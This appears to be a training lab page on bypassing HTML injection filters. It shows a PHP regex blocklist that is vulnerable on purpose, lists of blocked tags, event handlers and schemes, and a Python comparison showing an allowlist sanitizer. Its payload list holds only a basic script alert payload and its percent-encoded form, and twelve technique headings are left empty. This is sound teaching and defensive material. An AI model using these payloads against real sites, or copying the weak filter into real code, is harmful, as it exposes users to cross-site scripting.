Lab 4: Advanced HTML Injection Techniques

Complex HTML injection bypass techniques

Difficulty: High

Lab Overview

This lab demonstrates advanced HTML injection techniques used to bypass modern security filters and protections. These techniques include obfuscation, encoding, alternative tags, and other sophisticated bypass methods.

Objective: Use advanced techniques to bypass security filters and achieve HTML injection.

Advanced Vulnerable Code
// Vulnerable: regex blocklist that can be bypassed
function process_html_input_advanced($input) {
    // Each pattern targets one dangerous tag, event attribute or URL scheme;
    // anything the patterns do not describe passes through untouched.
    $dangerous_patterns = [
        '/<script[^>]*>.*?<\/script>/is',
        '/<iframe[^>]*>.*?<\/iframe>/is',
        '/<object[^>]*>.*?<\/object>/is',
        '/<embed[^>]*>.*?<\/embed>/is',
        '/<form[^>]*>.*?<\/form>/is',
        '/onload\s*=/i',
        '/onerror\s*=/i',
        '/onclick\s*=/i',
        '/javascript:/i',
        '/data:/i',
        '/vbscript:/i'
    ];
    
    // Blocklist check (can be bypassed): the first match rejects the input
    $is_dangerous = false;
    foreach ($dangerous_patterns as $pattern) {
        if (preg_match($pattern, $input)) {
            $is_dangerous = true;
            break;
        }
    }
    
    // Still vulnerable to advanced bypass techniques: input that matches no
    // pattern is returned verbatim and later rendered as HTML
    if (!$is_dangerous) {
        return $input;
    }
    return '';  // rejected input yields an empty string
}
Advanced HTML Injection
Advanced Filters

The following patterns are blocked by the regex filter:

  • Tags: script, iframe, object, embed, form, input, button, link, meta, style
  • Attributes: onload, onerror, onclick, onmouseover, onfocus, onchange, onsubmit, onkeypress, onkeydown, onkeyup
  • Protocols: javascript:, data:, vbscript:, file:, ftp:, gopher:
Safe HTML Tags

These tags should work:

  • <h1>Hello</h1> - Heading
  • <p>Paragraph</p> - Paragraph
  • <div>Container</div> - Container
  • <span>Inline</span> - Inline
Vulnerability Details
  • Type: Advanced HTML Injection Techniques
  • Severity: Critical
  • Method: POST
  • Issue: Advanced filters can be bypassed
Advanced Bypass Techniques
  • Obfuscation: Hide patterns and tags
  • Encoding: Use encoded characters
  • Alternative Tags: Use unfiltered tags
  • String Manipulation: Build HTML dynamically
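To make the filter design concrete, here is an added example (not part of the lab's own code) that puts a Python rendition of the PHP blocklist above next to the approach that actually holds up: an allowlist sanitizer that keeps only the four safe tags the lab lists (h1, p, div, span), strips every attribute, and entity-escapes all remaining text. The blocklist port covers only the eleven patterns in the code listing, not the longer lists in the Advanced Filters section; the sample inputs are the lab's safe tags and the two encodings of the script payload that appear on this page, and the function names are my own.

```python
import html
import re
from html.parser import HTMLParser
from typing import List, Optional

# Python rendition of the lab's PHP regex blocklist (the eleven patterns in the
# listing above). Constructed for this example; not the lab's own code.
BLOCKLIST = [
    re.compile(p, re.IGNORECASE | re.DOTALL)
    for p in (
        r"<script[^>]*>.*?</script>",
        r"<iframe[^>]*>.*?</iframe>",
        r"<object[^>]*>.*?</object>",
        r"<embed[^>]*>.*?</embed>",
        r"<form[^>]*>.*?</form>",
        r"onload\s*=",
        r"onerror\s*=",
        r"onclick\s*=",
        r"javascript:",
        r"data:",
        r"vbscript:",
    )
]


def blocklist_filter(user_input: str) -> Optional[str]:
    """Mirror of process_html_input_advanced(): the input is returned unchanged
    unless some pattern matches, in which case it is rejected (None)."""
    for pattern in BLOCKLIST:
        if pattern.search(user_input):
            return None
    return user_input


# Allowlist sanitizer: only the four "safe" tags from the lab survive, with all
# attributes stripped; every other tag is dropped and its text content, like all
# text, is entity-escaped on the way out.
ALLOWED_TAGS = frozenset({"h1", "p", "div", "span"})


class AllowlistSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)  # decode entities; we re-escape below
        self.parts: List[str] = []
        self.open_tags: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"<{tag}>")  # attributes (including on*=) are discarded
            self.open_tags.append(tag)
        # tags outside the allowlist emit nothing; their text still reaches handle_data

    def handle_endtag(self, tag):
        if tag not in self.open_tags:
            return  # stray or disallowed closing tag: ignore it
        while self.open_tags:  # close any tags left open inside this one
            top = self.open_tags.pop()
            self.parts.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        self.parts.append(html.escape(data, quote=True))

    def result(self) -> str:
        self.close()
        while self.open_tags:  # close whatever the input left unclosed
            self.parts.append(f"</{self.open_tags.pop()}>")
        return "".join(self.parts)


def sanitize(user_input: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(user_input)
    return parser.result()


if __name__ == "__main__":
    # Constructed sample inputs: a safe tag from the lab and the two encodings
    # of the script payload that the lab page itself lists.
    for sample in ("<h1>Hello</h1>",
                   "<script>alert('XSS')</script>",
                   "%3Cscript%3Ealert('XSS')%3C/script%3E"):
        print(f"{sample!r:45} blocklist={blocklist_filter(sample)!r} "
              f"allowlist={sanitize(sample)!r}")
```

Running it shows the difference in design: the blocklist rejects the literal `<script>` tag but passes the percent-encoded form untouched, because no regex describes it; whether that is exploitable then depends on what decodes the value downstream, which the filter cannot know. The allowlist never has to answer that question, since anything that is not one of the four permitted tags is either dropped or escaped, and an attribute on a permitted tag never reaches the output at all. For a production PHP application the same policy is better delegated to a maintained library such as HTML Purifier than to hand-written code.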
Advanced HTML Injection Bypass Payloads

Use these advanced techniques to bypass security filters:

1. Character Encoding Bypass:
  • <script>alert('XSS')</script>
  • %3Cscript%3Ealert('XSS')%3C/script%3E
2. Case Variation Bypass:
3. Alternative Tags Bypass:
4. Attribute Bypass:
5. Protocol Bypass:
6. String Concatenation Bypass:
7. Alternative Attributes Bypass:
8. Event Handler Bypass:
9. CSS Injection Bypass:
10. Advanced Bypass Techniques:
11. Unicode and Encoding Bypass:
12. Alternative Event Handlers:
13. Data URI Bypass: